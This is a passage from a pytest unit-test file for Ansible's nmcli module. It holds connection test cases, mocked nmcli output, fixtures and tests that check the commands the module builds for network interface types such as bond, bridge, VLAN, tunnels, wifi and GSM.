'_ansible_check_mode': True,
},
{
'type': 'vxlan',
'conn_name': 'non_existent_nw_device',
'state': 'absent',
'_ansible_check_mode': True,
},
{
'type': 'gre',
'conn_name': 'non_existent_nw_device',
'state': 'absent',
'_ansible_check_mode': True,
},
{
'type': 'ipip',
'conn_name': 'non_existent_nw_device',
'state': 'absent',
'_ansible_check_mode': True,
},
{
'type': 'sit',
'conn_name': 'non_existent_nw_device',
'state': 'absent',
'_ansible_check_mode': True,
},
{
'type': 'dummy',
'conn_name': 'non_existent_nw_device',
'state': 'absent',
'_ansible_check_mode': True,
},
{
'type': 'gsm',
'conn_name': 'non_existent_nw_device',
'state': 'absent',
'_ansible_check_mode': True,
},
]
TESTCASE_GENERIC = [
{
'type': 'generic',
'conn_name': 'non_existent_nw_device',
'ifname': 'generic_non_existant',
'ip4': '10.10.10.10/24',
'gw4': '10.10.10.1',
'state': 'present',
'_ansible_check_mode': False,
},
]
TESTCASE_GENERIC_SHOW_OUTPUT = """\
connection.id: non_existent_nw_device
connection.interface-name: generic_non_existant
connection.autoconnect: yes
ipv4.method: manual
ipv4.addresses: 10.10.10.10/24
ipv4.gateway: 10.10.10.1
ipv4.ignore-auto-dns: no
ipv4.ignore-auto-routes: no
ipv4.never-default: no
ipv4.may-fail: yes
ipv6.method: auto
ipv6.ignore-auto-dns: no
ipv6.ignore-auto-routes: no
"""
TESTCASE_GENERIC_MODIFY_ROUTING_RULES = [
{
'type': 'generic',
'conn_name': 'non_existent_nw_device',
'ifname': 'generic_non_existant',
'ip4': '10.10.10.10/24',
'gw4': '10.10.10.1',
'routing_rules4': ['priority 5 from 10.0.0.0/24 table 5000', 'priority 10 from 10.0.1.0/24 table 5001'],
'state': 'present',
'_ansible_check_mode': False,
},
]
TESTCASE_GENERIC_MODIFY_ROUTING_RULES_SHOW_OUTPUT = """\
connection.id: non_existent_nw_device
connection.interface-name: generic_non_existant
connection.autoconnect: yes
ipv4.method: manual
ipv4.addresses: 10.10.10.10/24
ipv4.gateway: 10.10.10.1
ipv4.routing-rules: priority 5 from 10.0.0.0/24 table 5000, priority 10 from 10.0.1.0/24 table 5001
ipv4.ignore-auto-dns: no
ipv4.ignore-auto-routes: no
ipv4.never-default: no
ipv4.may-fail: yes
ipv6.method: auto
ipv6.ignore-auto-dns: no
ipv6.ignore-auto-routes: no
"""
TESTCASE_GENERIC_DNS4_SEARCH = [
{
'type': 'generic',
'conn_name': 'non_existent_nw_device',
'ifname': 'generic_non_existant',
'ip4': '10.10.10.10/24',
'gw4': '10.10.10.1',
'state': 'present',
'dns4_search': 'search.redhat.com',
'dns6_search': 'search6.redhat.com',
'_ansible_check_mode': False,
}
]
TESTCASE_GENERIC_DNS4_SEARCH_SHOW_OUTPUT = """\
connection.id: non_existent_nw_device
connection.interface-name: generic_non_existant
connection.autoconnect: yes
ipv4.method: manual
ipv4.addresses: 10.10.10.10/24
ipv4.gateway: 10.10.10.1
ipv4.ignore-auto-dns: no
ipv4.ignore-auto-routes: no
ipv4.never-default: no
ipv4.dns-search: search.redhat.com
ipv4.may-fail: yes
ipv6.dns-search: search6.redhat.com
ipv6.method: auto
ipv6.ignore-auto-dns: no
ipv6.ignore-auto-routes: no
"""
TESTCASE_GENERIC_ZONE = [
{
'type': 'generic',
'conn_name': 'non_existent_nw_device',
'ifname': 'generic_non_existant',
'ip4': '10.10.10.10/24',
'gw4': '10.10.10.1',
'state': 'present',
'zone': 'external',
'_ansible_check_mode': False,
}
]
TESTCASE_GENERIC_ZONE_SHOW_OUTPUT = """\
connection.id: non_existent_nw_device
connection.interface-name: generic_non_existant
connection.autoconnect: yes
connection.zone: external
ipv4.method: manual
ipv4.addresses: 10.10.10.10/24
ipv4.gateway: 10.10.10.1
ipv4.ignore-auto-dns: no
ipv4.ignore-auto-routes: no
ipv4.never-default: no
ipv4.may-fail: yes
ipv6.method: auto
ipv6.ignore-auto-dns: no
ipv6.ignore-auto-routes: no
"""
TESTCASE_BOND = [
{
'type': 'bond',
'conn_name': 'non_existent_nw_device',
'ifname': 'bond_non_existant',
'mode': 'active-backup',
'ip4': '10.10.10.10/24',
'gw4': '10.10.10.1',
'state': 'present',
'primary': 'non_existent_primary',
'_ansible_check_mode': False,
}
]
TESTCASE_BOND_SHOW_OUTPUT = """\
connection.id: non_existent_nw_device
connection.interface-name: bond_non_existant
connection.autoconnect: yes
ipv4.method: manual
ipv4.addresses: 10.10.10.10/24
ipv4.gateway: 10.10.10.1
ipv4.ignore-auto-dns: no
ipv4.ignore-auto-routes: no
ipv4.never-default: no
ipv4.may-fail: yes
ipv6.method: auto
ipv6.ignore-auto-dns: no
ipv6.ignore-auto-routes: no
bond.options: mode=active-backup,primary=non_existent_primary
"""
TESTCASE_BRIDGE = [
{
'type': 'bridge',
'conn_name': 'non_existent_nw_device',
'ifname': 'br0_non_existant',
'ip4': '10.10.10.10/24',
'gw4': '10.10.10.1',
'mac': '52:54:00:ab:cd:ef',
'maxage': 100,
'stp': True,
'state': 'present',
'_ansible_check_mode': False,
}
]
TESTCASE_BRIDGE_SHOW_OUTPUT = """\
connection.id: non_existent_nw_device
connection.interface-name: br0_non_existant
connection.autoconnect: yes
ipv4.method: manual
ipv4.addresses: 10.10.10.10/24
ipv4.gateway: 10.10.10.1
ipv4.ignore-auto-dns: no
ipv4.ignore-auto-routes: no
ipv4.never-default: no
ipv4.may-fail: yes
ipv6.method: auto
ipv6.ignore-auto-dns: no
ipv6.ignore-auto-routes: no
bridge.mac-address: 52:54:00:AB:CD:EF
bridge.stp: yes
bridge.max-age: 100
bridge.ageing-time: 300
bridge.hello-time: 2
bridge.priority: 128
bridge.forward-delay: 15
"""
TESTCASE_BRIDGE_SLAVE = [
{
'type': 'bridge-slave',
'conn_name': 'non_existent_nw_device',
'ifname': 'br0_non_existant',
'path_cost': 100,
'state': 'present',
'_ansible_check_mode': False,
}
]
TESTCASE_BRIDGE_SLAVE_SHOW_OUTPUT = """\
connection.id: non_existent_nw_device
connection.interface-name: br0_non_existant
connection.autoconnect: yes
connection.slave-type: bridge
ipv4.never-default: no
bridge-port.path-cost: 100
bridge-port.hairpin-mode: yes
bridge-port.priority: 32
"""
TESTCASE_TEAM = [
{
'type': 'team',
'conn_name': 'non_existent_nw_device',
'ifname': 'team0_non_existant',
'state': 'present',
'_ansible_check_mode': False,
}
]
TESTCASE_TEAM_SHOW_OUTPUT = """\
connection.id: non_existent_nw_device
connection.interface-name: team0_non_existant
connection.autoconnect: yes
connection.type: team
ipv4.ignore-auto-dns: no
ipv4.ignore-auto-routes: no
ipv4.never-default: no
ipv4.may-fail: yes
ipv6.method: auto
ipv6.ignore-auto-dns: no
ipv6.ignore-auto-routes: no
team.runner: roundrobin
"""
TESTCASE_TEAM_HWADDR_POLICY_FAILS = [
{
'type': 'team',
'conn_name': 'non_existent_nw_device',
'ifname': 'team0_non_existant',
'runner_hwaddr_policy': 'by_active',
'state': 'present',
'_ansible_check_mode': False,
}
]
TESTCASE_TEAM_SLAVE = [
{
'type': 'team-slave',
'conn_name': 'non_existent_nw_slaved_device',
'ifname': 'generic_slaved_non_existant',
'master': 'team0_non_existant',
'state': 'present',
'_ansible_check_mode': False,
}
]
TESTCASE_TEAM_SLAVE_SHOW_OUTPUT = """\
connection.id: non_existent_nw_slaved_device
connection.interface-name: generic_slaved_non_existant
connection.autoconnect: yes
connection.master: team0_non_existant
connection.slave-type: team
802-3-ethernet.mtu: auto
"""
TESTCASE_VLAN = [
{
'type': 'vlan',
'conn_name': 'non_existent_nw_device',
'ifname': 'vlan_not_exists',
'ip4': '10.10.10.10/24',
'gw4': '10.10.10.1',
'vlanid': 10,
'state': 'present',
'_ansible_check_mode': False,
}
]
TESTCASE_VLAN_SHOW_OUTPUT = """\
connection.id: non_existent_nw_device
connection.interface-name: vlan_not_exists
connection.autoconnect: yes
ipv4.method: manual
ipv4.addresses: 10.10.10.10/24
ipv4.gateway: 10.10.10.1
ipv4.ignore-auto-dns: no
ipv4.ignore-auto-routes: no
ipv4.never-default: no
ipv4.may-fail: yes
ipv6.method: auto
ipv6.ignore-auto-dns: no
ipv6.ignore-auto-routes: no
vlan.id: 10
"""
TESTCASE_VXLAN = [
{
'type': 'vxlan',
'conn_name': 'non_existent_nw_device',
'ifname': 'vxlan-existent_nw_device',
'vxlan_id': 11,
'vxlan_local': '192.168.225.5',
'vxlan_remote': '192.168.225.6',
'state': 'present',
'_ansible_check_mode': False,
}
]
TESTCASE_VXLAN_SHOW_OUTPUT = """\
connection.id: non_existent_nw_device
connection.interface-name: vxlan-existent_nw_device
connection.autoconnect: yes
vxlan.id: 11
vxlan.local: 192.168.225.5
vxlan.remote: 192.168.225.6
"""
TESTCASE_GRE = [
{
'type': 'gre',
'conn_name': 'non_existent_nw_device',
'ifname': 'gre-existent_nw_device',
'ip_tunnel_dev': 'non_existent_gre_device',
'ip_tunnel_local': '192.168.225.5',
'ip_tunnel_remote': '192.168.225.6',
'ip_tunnel_input_key': '1',
'ip_tunnel_output_key': '2',
'state': 'present',
'_ansible_check_mode': False,
}
]
TESTCASE_GRE_SHOW_OUTPUT = """\
connection.id: non_existent_nw_device
connection.interface-name: gre-existent_nw_device
connection.autoconnect: yes
ipv4.ignore-auto-dns: no
ipv4.ignore-auto-routes: no
ipv4.never-default: no
ipv4.may-fail: yes
ipv6.ignore-auto-dns: no
ipv6.ignore-auto-routes: no
ip-tunnel.mode: gre
ip-tunnel.parent: non_existent_gre_device
ip-tunnel.local: 192.168.225.5
ip-tunnel.remote: 192.168.225.6
ip-tunnel.input-key: 1
ip-tunnel.output-key: 2
"""
TESTCASE_IPIP = [
{
'type': 'ipip',
'conn_name': 'non_existent_nw_device',
'ifname': 'ipip-existent_nw_device',
'ip_tunnel_dev': 'non_existent_ipip_device',
'ip_tunnel_local': '192.168.225.5',
'ip_tunnel_remote': '192.168.225.6',
'state': 'present',
'_ansible_check_mode': False,
}
]
TESTCASE_IPIP_SHOW_OUTPUT = """\
connection.id: non_existent_nw_device
connection.interface-name: ipip-existent_nw_device
connection.autoconnect: yes
ipv4.ignore-auto-dns: no
ipv4.ignore-auto-routes: no
ipv4.never-default: no
ipv4.may-fail: yes
ipv6.ignore-auto-dns: no
ipv6.ignore-auto-routes: no
ip-tunnel.mode: ipip
ip-tunnel.parent: non_existent_ipip_device
ip-tunnel.local: 192.168.225.5
ip-tunnel.remote: 192.168.225.6
"""
TESTCASE_SIT = [
{
'type': 'sit',
'conn_name': 'non_existent_nw_device',
'ifname': 'sit-existent_nw_device',
'ip_tunnel_dev': 'non_existent_sit_device',
'ip_tunnel_local': '192.168.225.5',
'ip_tunnel_remote': '192.168.225.6',
'state': 'present',
'_ansible_check_mode': False,
}
]
TESTCASE_SIT_SHOW_OUTPUT = """\
connection.id: non_existent_nw_device
connection.interface-name: sit-existent_nw_device
connection.autoconnect: yes
ipv4.ignore-auto-dns: no
ipv4.ignore-auto-routes: no
ipv4.never-default: no
ipv4.may-fail: yes
ipv6.ignore-auto-dns: no
ipv6.ignore-auto-routes: no
ip-tunnel.mode: sit
ip-tunnel.parent: non_existent_sit_device
ip-tunnel.local: 192.168.225.5
ip-tunnel.remote: 192.168.225.6
"""
TESTCASE_ETHERNET_DHCP = [
{
'type': 'ethernet',
'conn_name': 'non_existent_nw_device',
'ifname': 'ethernet_non_existant',
'dhcp_client_id': '00:11:22:AA:BB:CC:DD',
'state': 'present',
'_ansible_check_mode': False,
}
]
TESTCASE_ETHERNET_DHCP_SHOW_OUTPUT = """\
connection.id: non_existent_nw_device
connection.interface-name: ethernet_non_existant
connection.autoconnect: yes
802-3-ethernet.mtu: auto
ipv4.method: auto
ipv4.dhcp-client-id: 00:11:22:AA:BB:CC:DD
ipv4.ignore-auto-dns: no
ipv4.ignore-auto-routes: no
ipv4.never-default: no
ipv4.may-fail: yes
ipv6.method: auto
ipv6.ignore-auto-dns: no
ipv6.ignore-auto-routes: no
"""
TESTCASE_ETHERNET_STATIC = [
{
'type': 'ethernet',
'conn_name': 'non_existent_nw_device',
'ifname': 'ethernet_non_existant',
'ip4': '10.10.10.10/24',
'gw4': '10.10.10.1',
'dns4': ['1.1.1.1', '8.8.8.8'],
'state': 'present',
'_ansible_check_mode': False,
}
]
TESTCASE_ETHERNET_STATIC_SHOW_OUTPUT = """\
connection.id: non_existent_nw_device
connection.interface-name: ethernet_non_existant
connection.autoconnect: yes
802-3-ethernet.mtu: auto
ipv4.method: manual
ipv4.addresses: 10.10.10.10/24
ipv4.gateway: 10.10.10.1
ipv4.ignore-auto-dns: no
ipv4.ignore-auto-routes: no
ipv4.never-default: no
ipv4.may-fail: yes
ipv4.dns: 1.1.1.1,8.8.8.8
ipv6.method: auto
ipv6.ignore-auto-dns: no
ipv6.ignore-auto-routes: no
"""
TESTCASE_ETHERNET_STATIC_IP6_ADDRESS_SHOW_OUTPUT = """\
connection.id: non_existent_nw_device
connection.interface-name: ethernet_non_existant
connection.autoconnect: yes
802-3-ethernet.mtu: auto
ipv6.method: manual
ipv6.addresses: 2001:db8::cafe/128
ipv6.gateway: 2001:db8::cafa
ipv6.ignore-auto-dns: no
ipv6.ignore-auto-routes: no
ipv6.never-default: no
ipv6.may-fail: yes
ipv6.dns: 2001:4860:4860::8888,2001:4860:4860::8844
ipv4.method: disabled
ipv4.ignore-auto-dns: no
ipv4.ignore-auto-routes: no
ipv4.never-default: no
ipv4.may-fail: yes
"""
TESTCASE_WIRELESS = [
{
'type': 'wifi',
'conn_name': 'non_existent_nw_device',
'ifname': 'wireless_non_existant',
'ip4': '10.10.10.10/24',
'ssid': 'Brittany',
'wifi': {
'hidden': True,
'mode': 'ap',
},
'state': 'present',
'_ansible_check_mode': False,
}
]
TESTCASE_SECURE_WIRELESS = [
{
'type': 'wifi',
'conn_name': 'non_existent_nw_device',
'ifname': 'wireless_non_existant',
'ip4': '10.10.10.10/24',
'ssid': 'Brittany',
'wifi_sec': {
'key-mgmt': 'wpa-psk',
'psk': 'VERY_SECURE_PASSWORD',
},
'state': 'present',
'_ansible_check_mode': False,
}
]
TESTCASE_DEFAULT_WIRELESS_SHOW_OUTPUT = """\
802-11-wireless.ssid: --
802-11-wireless.mode: infrastructure
802-11-wireless.band: --
802-11-wireless.channel: 0
802-11-wireless.bssid: --
802-11-wireless.rate: 0
802-11-wireless.tx-power: 0
802-11-wireless.mac-address: --
802-11-wireless.cloned-mac-address: --
802-11-wireless.generate-mac-address-mask:--
802-11-wireless.mac-address-blacklist: --
802-11-wireless.mac-address-randomization:default
802-11-wireless.mtu: auto
802-11-wireless.seen-bssids: --
802-11-wireless.hidden: no
802-11-wireless.powersave: 0 (default)
802-11-wireless.wake-on-wlan: 0x1 (default)
802-11-wireless.ap-isolation: -1 (default)
"""
TESTCASE_DEFAULT_SECURE_WIRELESS_SHOW_OUTPUT = \
TESTCASE_DEFAULT_WIRELESS_SHOW_OUTPUT + """\
802-11-wireless-security.key-mgmt: --
802-11-wireless-security.wep-tx-keyidx: 0
802-11-wireless-security.auth-alg: --
802-11-wireless-security.proto: --
802-11-wireless-security.pairwise: --
802-11-wireless-security.group: --
802-11-wireless-security.pmf: 0 (default)
802-11-wireless-security.leap-username: --
802-11-wireless-security.wep-key0: --
802-11-wireless-security.wep-key1: --
802-11-wireless-security.wep-key2: --
802-11-wireless-security.wep-key3: --
802-11-wireless-security.wep-key-flags: 0 (none)
802-11-wireless-security.wep-key-type: unknown
802-11-wireless-security.psk: testingtestingtesting
802-11-wireless-security.psk-flags: 0 (none)
802-11-wireless-security.leap-password: --
802-11-wireless-security.leap-password-flags:0 (none)
802-11-wireless-security.wps-method: 0x0 (default)
802-11-wireless-security.fils: 0 (default)
"""
TESTCASE_DUMMY_STATIC = [
{
'type': 'dummy',
'conn_name': 'non_existent_nw_device',
'ifname': 'dummy_non_existant',
'ip4': '10.10.10.10/24',
'gw4': '10.10.10.1',
'dns4': ['1.1.1.1', '8.8.8.8'],
'ip6': '2001:db8::1/128',
'state': 'present',
'_ansible_check_mode': False,
}
]
TESTCASE_DUMMY_STATIC_SHOW_OUTPUT = """\
connection.id: non_existent_nw_device
connection.interface-name: dummy_non_existant
connection.autoconnect: yes
802-3-ethernet.mtu: auto
ipv4.method: manual
ipv4.addresses: 10.10.10.10/24
ipv4.gateway: 10.10.10.1
ipv4.ignore-auto-dns: no
ipv4.ignore-auto-routes: no
ipv4.never-default: no
ipv4.may-fail: yes
ipv4.dns: 1.1.1.1,8.8.8.8
ipv6.ignore-auto-dns: no
ipv6.ignore-auto-routes: no
ipv6.method: manual
ipv6.addresses: 2001:db8::1/128
"""
TESTCASE_DUMMY_STATIC_WITHOUT_MTU_SHOW_OUTPUT = """\
connection.id: non_existent_nw_device
connection.interface-name: dummy_non_existant
connection.autoconnect: yes
ipv4.method: manual
ipv4.addresses: 10.10.10.10/24
ipv4.gateway: 10.10.10.1
ipv4.ignore-auto-dns: no
ipv4.ignore-auto-routes: no
ipv4.never-default: no
ipv4.may-fail: yes
ipv4.dns: 1.1.1.1,8.8.8.8
ipv6.method: auto
ipv6.ignore-auto-dns: no
ipv6.ignore-auto-routes: no
ipv6.method: manual
ipv6.addresses: 2001:db8::1/128
"""
TESTCASE_DUMMY_STATIC_WITH_CUSTOM_MTU_SHOW_OUTPUT = """\
connection.id: non_existent_nw_device
connection.interface-name: dummy_non_existant
connection.autoconnect: yes
802-3-ethernet.mtu: 1500
ipv4.method: manual
ipv4.addresses: 10.10.10.10/24
ipv4.gateway: 10.10.10.1
ipv4.ignore-auto-dns: no
ipv4.ignore-auto-routes: no
ipv4.never-default: no
ipv4.may-fail: yes
ipv4.dns: 1.1.1.1,8.8.8.8
ipv6.method: auto
ipv6.ignore-auto-dns: no
ipv6.ignore-auto-routes: no
ipv6.method: manual
ipv6.addresses: 2001:db8::1/128
"""
TESTCASE_GSM = [
{
'type': 'gsm',
'conn_name': 'non_existent_nw_device',
'ifname': 'gsm_non_existant',
'gsm': {
'apn': 'internet.telekom',
'username': 't-mobile',
'password': 'tm',
'pin': '1234',
},
'method4': 'auto',
'state': 'present',
'_ansible_check_mode': False,
}
]
TESTCASE_GSM_SHOW_OUTPUT = """\
connection.id: non_existent_nw_device
connection.type: gsm
connection.interface-name: gsm_non_existant
connection.autoconnect: yes
ipv4.method: auto
ipv4.ignore-auto-dns: no
ipv4.ignore-auto-routes: no
ipv4.never-default: no
ipv4.may-fail: yes
ipv6.method: auto
ipv6.ignore-auto-dns: no
ipv6.ignore-auto-routes: no
gsm.auto-config: no
gsm.number: --
gsm.username: t-mobile
gsm.password: tm
gsm.password-flags: 0 (none)
gsm.apn: "internet.telekom"
gsm.network-id: --
gsm.pin: 1234
gsm.pin-flags: 0 (none)
gsm.home-only: no
gsm.device-id: --
gsm.sim-id: --
gsm.sim-operator-id: --
gsm.mtu: auto
"""
def mocker_set(mocker,
connection_exists=False,
execute_return=(0, "", ""),
execute_side_effect=None,
changed_return=None):
"""
Common mocker object
"""
get_bin_path = mocker.patch('ansible.module_utils.basic.AnsibleModule.get_bin_path')
get_bin_path.return_value = '/usr/bin/nmcli'
connection = mocker.patch.object(nmcli.Nmcli, 'connection_exists')
connection.return_value = connection_exists
execute_command = mocker.patch.object(nmcli.Nmcli, 'execute_command')
if execute_return:
execute_command.return_value = execute_return
if execute_side_effect:
execute_command.side_effect = execute_side_effect
if changed_return:
is_connection_changed = mocker.patch.object(nmcli.Nmcli, 'is_connection_changed')
is_connection_changed.return_value = changed_return
@pytest.fixture
def mocked_generic_connection_create(mocker):
mocker_set(mocker)
@pytest.fixture
def mocked_connection_exists(mocker):
mocker_set(mocker, connection_exists=True)
@pytest.fixture
def mocked_generic_connection_modify(mocker):
mocker_set(mocker,
connection_exists=True,
changed_return=(True, dict()))
@pytest.fixture
def mocked_generic_connection_unchanged(mocker):
mocker_set(mocker,
connection_exists=True,
execute_return=(0, TESTCASE_GENERIC_SHOW_OUTPUT, ""))
@pytest.fixture
def mocked_generic_connection_unchanged(mocker):
mocker_set(mocker,
connection_exists=True,
execute_return=(0, TESTCASE_GENERIC_MODIFY_ROUTING_RULES_SHOW_OUTPUT, ""))
@pytest.fixture
def mocked_generic_connection_dns_search_unchanged(mocker):
mocker_set(mocker,
connection_exists=True,
execute_return=(0, TESTCASE_GENERIC_DNS4_SEARCH_SHOW_OUTPUT, ""))
@pytest.fixture
def mocked_generic_connection_zone_unchanged(mocker):
mocker_set(mocker,
connection_exists=True,
execute_return=(0, TESTCASE_GENERIC_ZONE_SHOW_OUTPUT, ""))
@pytest.fixture
def mocked_bond_connection_unchanged(mocker):
mocker_set(mocker,
connection_exists=True,
execute_return=(0, TESTCASE_BOND_SHOW_OUTPUT, ""))
@pytest.fixture
def mocked_bridge_connection_unchanged(mocker):
mocker_set(mocker,
connection_exists=True,
execute_return=(0, TESTCASE_BRIDGE_SHOW_OUTPUT, ""))
@pytest.fixture
def mocked_bridge_slave_unchanged(mocker):
mocker_set(mocker,
connection_exists=True,
execute_return=(0, TESTCASE_BRIDGE_SLAVE_SHOW_OUTPUT, ""))
@pytest.fixture
def mocked_team_connection_unchanged(mocker):
mocker_set(mocker,
connection_exists=True,
execute_return=(0, TESTCASE_TEAM_SHOW_OUTPUT, ""))
@pytest.fixture
def mocked_team_slave_connection_unchanged(mocker):
mocker_set(mocker,
connection_exists=True,
execute_return=(0, TESTCASE_TEAM_SLAVE_SHOW_OUTPUT, ""))
@pytest.fixture
def mocked_vlan_connection_unchanged(mocker):
mocker_set(mocker,
connection_exists=True,
execute_return=(0, TESTCASE_VLAN_SHOW_OUTPUT, ""))
@pytest.fixture
def mocked_vxlan_connection_unchanged(mocker):
mocker_set(mocker,
connection_exists=True,
execute_return=(0, TESTCASE_VXLAN_SHOW_OUTPUT, ""))
@pytest.fixture
def mocked_gre_connection_unchanged(mocker):
mocker_set(mocker,
connection_exists=True,
execute_return=(0, TESTCASE_GRE_SHOW_OUTPUT, ""))
@pytest.fixture
def mocked_ipip_connection_unchanged(mocker):
mocker_set(mocker,
connection_exists=True,
execute_return=(0, TESTCASE_IPIP_SHOW_OUTPUT, ""))
@pytest.fixture
def mocked_sit_connection_unchanged(mocker):
mocker_set(mocker,
connection_exists=True,
execute_return=(0, TESTCASE_SIT_SHOW_OUTPUT, ""))
@pytest.fixture
def mocked_ethernet_connection_unchanged(mocker):
mocker_set(mocker,
connection_exists=True,
execute_return=(0, TESTCASE_ETHERNET_DHCP, ""))
@pytest.fixture
def mocked_ethernet_connection_dhcp_unchanged(mocker):
mocker_set(mocker,
connection_exists=True,
execute_return=(0, TESTCASE_ETHERNET_DHCP_SHOW_OUTPUT, ""))
@pytest.fixture
def mocked_ethernet_connection_static_unchanged(mocker):
mocker_set(mocker,
connection_exists=True,
execute_return=(0, TESTCASE_ETHERNET_STATIC_SHOW_OUTPUT, ""))
@pytest.fixture
def mocked_ethernet_connection_with_ipv6_address_static_modify(mocker):
mocker_set(mocker,
connection_exists=True,
execute_return=None,
execute_side_effect=(
(0, TESTCASE_ETHERNET_STATIC_IP6_ADDRESS_SHOW_OUTPUT, ""),
(0, "", ""),
))
@pytest.fixture
def mocked_ethernet_connection_dhcp_to_static(mocker):
mocker_set(mocker,
connection_exists=True,
execute_return=None,
execute_side_effect=(
(0, TESTCASE_ETHERNET_DHCP_SHOW_OUTPUT, ""),
(0, "", ""),
))
@pytest.fixture
def mocked_wireless_create(mocker):
mocker_set(mocker,
execute_return=None,
execute_side_effect=(
(0, TESTCASE_DEFAULT_WIRELESS_SHOW_OUTPUT, ""),
(0, "", ""),
))
@pytest.fixture
def mocked_secure_wireless_create(mocker):
mocker_set(mocker,
execute_return=None,
execute_side_effect=(
(0, TESTCASE_DEFAULT_SECURE_WIRELESS_SHOW_OUTPUT, ""),
(0, "", ""),
(0, "", ""),
))
@pytest.fixture
def mocked_secure_wireless_create_failure(mocker):
mocker_set(mocker,
execute_return=None,
execute_side_effect=(
(0, TESTCASE_DEFAULT_SECURE_WIRELESS_SHOW_OUTPUT, ""),
(1, "", ""),
))
@pytest.fixture
def mocked_secure_wireless_modify(mocker):
mocker_set(mocker,
connection_exists=True,
execute_return=None,
execute_side_effect=(
(0, TESTCASE_DEFAULT_SECURE_WIRELESS_SHOW_OUTPUT, ""),
(0, "", ""),
(0, "", ""),
(0, "", ""),
))
@pytest.fixture
def mocked_secure_wireless_modify_failure(mocker):
mocker_set(mocker,
connection_exists=True,
execute_return=None,
execute_side_effect=(
(0, TESTCASE_DEFAULT_SECURE_WIRELESS_SHOW_OUTPUT, ""),
(0, "", ""),
(1, "", ""),
))
@pytest.fixture
def mocked_dummy_connection_static_unchanged(mocker):
mocker_set(mocker,
connection_exists=True,
execute_return=(0, TESTCASE_DUMMY_STATIC_SHOW_OUTPUT, ""))
@pytest.fixture
def mocked_dummy_connection_static_without_mtu_unchanged(mocker):
mocker_set(mocker,
connection_exists=True,
execute_return=(0, TESTCASE_DUMMY_STATIC_WITHOUT_MTU_SHOW_OUTPUT, ""))
@pytest.fixture
def mocked_dummy_connection_static_with_custom_mtu_modify(mocker):
mocker_set(mocker,
connection_exists=True,
execute_return=None,
execute_side_effect=(
(0, TESTCASE_DUMMY_STATIC_WITH_CUSTOM_MTU_SHOW_OUTPUT, ""),
(0, "", ""),
))
@pytest.fixture
def mocked_gsm_connection_unchanged(mocker):
mocker_set(mocker,
connection_exists=True,
execute_return=(0, TESTCASE_GSM_SHOW_OUTPUT, ""))
@pytest.mark.parametrize('patch_ansible_module', TESTCASE_BOND, indirect=['patch_ansible_module'])
def test_bond_connection_create(mocked_generic_connection_create, capfd):
"""
Test : Bond connection created
"""
with pytest.raises(SystemExit):
nmcli.main()
assert nmcli.Nmcli.execute_command.call_count == 1
arg_list = nmcli.Nmcli.execute_command.call_args_list
args, kwargs = arg_list[0]
assert args[0][0] == '/usr/bin/nmcli'
assert args[0][1] == 'con'
assert args[0][2] == 'add'
assert args[0][3] == 'type'
assert args[0][4] == 'bond'
assert args[0][5] == 'con-name'
assert args[0][6] == 'non_existent_nw_device'
for param in ['ipv4.gateway', 'primary', 'connection.autoconnect',
'connection.interface-name', 'bond_non_existant',
'mode', 'active-backup', 'ipv4.addresses']:
assert param in args[0]
out, err = capfd.readouterr()
results = json.loads(out)
assert not results.get('failed')
assert results['changed']
@pytest.mark.parametrize('patch_ansible_module', TESTCASE_BOND, indirect=['patch_ansible_module'])
def test_bond_connection_unchanged(mocked_bond_connection_unchanged, capfd):
"""
Test : Bond connection unchanged
"""
with pytest.raises(SystemExit):
nmcli.main()
out, err = capfd.readouterr()
results = json.loads(out)
assert not results.get('failed')
assert not results['changed']
@pytest.mark.parametrize('patch_ansible_module', TESTCASE_GENERIC, indirect=['patch_ansible_module'])
def test_generic_connection_create(mocked_generic_connection_create, capfd):
"""
Test : Generic connection created
"""
with pytest.raises(SystemExit):
nmcli.main()
assert nmcli.Nmcli.execute_command.call_count == 1
arg_list = nmcli.Nmcli.execute_command.call_args_list
args, kwargs = arg_list[0]
assert args[0][0] == '/usr/bin/nmcli'
assert args[0][1] == 'con'
assert args[0][2] == 'add'
assert args[0][3] == 'type'
assert args[0][4] == 'generic'
assert args[0][5] == 'con-name'
assert args[0][6] == 'non_existent_nw_device'
for param in ['connection.autoconnect', 'ipv4.gateway', 'ipv4.addresses']:
assert param in args[0]
out, err = capfd.readouterr()
results = json.loads(out)
assert not results.get('failed')
assert results['changed']
@pytest.mark.parametrize('patch_ansible_module', TESTCASE_GENERIC, indirect=['patch_ansible_module'])
def test_generic_connection_modify(mocked_generic_connection_modify, capfd):
"""
Test : Generic connection modify
"""
with pytest.raises(SystemExit):
nmcli.main()
assert nmcli.Nmcli.execute_command.call_count == 1
arg_list = nmcli.Nmcli.execute_command.call_args_list
args, kwargs = arg_list[0]
assert args[0][0] == '/usr/bin/nmcli'
assert args[0][1] == 'con'
assert args[0][2] == 'modify'
assert args[0][3] == 'non_existent_nw_device'
for param in ['ipv4.gateway', 'ipv4.addresses']:
assert param in args[0]
out, err = capfd.readouterr()
results = json.loads(out)
assert not results.get('failed')
assert results['changed']
@pytest.mark.parametrize('patch_ansible_module', TESTCASE_GENERIC, indirect=['patch_ansible_module'])
def test_generic_connection_unchanged(mocked_generic_connection_unchanged, capfd):
"""
Test : Generic connection unchanged
"""
with pytest.raises(SystemExit):
nmcli.main()
out, err = capfd.readouterr()
results = json.loads(out)
assert not results.get('failed')
assert not results['changed']
@pytest.mark.parametrize('patch_ansible_module', TESTCASE_GENERIC_MODIFY_ROUTING_RULES, indirect=['patch_ansible_module'])
def test_generic_connection_modify_routing_rules4(mocked_generic_connection_create, capfd):
"""
Test : Generic connection modified with routing-rules4
"""
with pytest.raises(SystemExit):
nmcli.main()
assert nmcli.Nmcli.execute_command.call_count == 1
arg_list = nmcli.Nmcli.execute_command.call_args_list
args, kwargs = arg_list[0]
assert 'ipv4.routing-rules' in args[0]
out, err = capfd.readouterr()
results = json.loads(out)
assert not results.get('failed')
assert results['changed']
@pytest.mark.parametrize('patch_ansible_module', TESTCASE_GENERIC_DNS4_SEARCH, indirect=['patch_ansible_module'])
def test_generic_connection_create_dns_search(mocked_generic_connection_create, capfd):
"""
Test : Generic connection created with dns search
"""
with pytest.raises(SystemExit):
nmcli.main()
assert nmcli.Nmcli.execute_command.call_count == 1
arg_list = nmcli.Nmcli.execute_command.call_args_list
args, kwargs = arg_list[0]
assert 'ipv4.dns-search' in args[0]
assert 'ipv6.dns-search' in args[0]
out, err = capfd.readouterr()
results = json.loads(out)
assert not results.get('failed')
assert results['changed']
@pytest.mark.parametrize('patch_ansible_module', TESTCASE_GENERIC_DNS4_SEARCH, indirect=['patch_ansible_module'])
def test_generic_connection_modify_dns_search(mocked_generic_connection_create, capfd):
"""
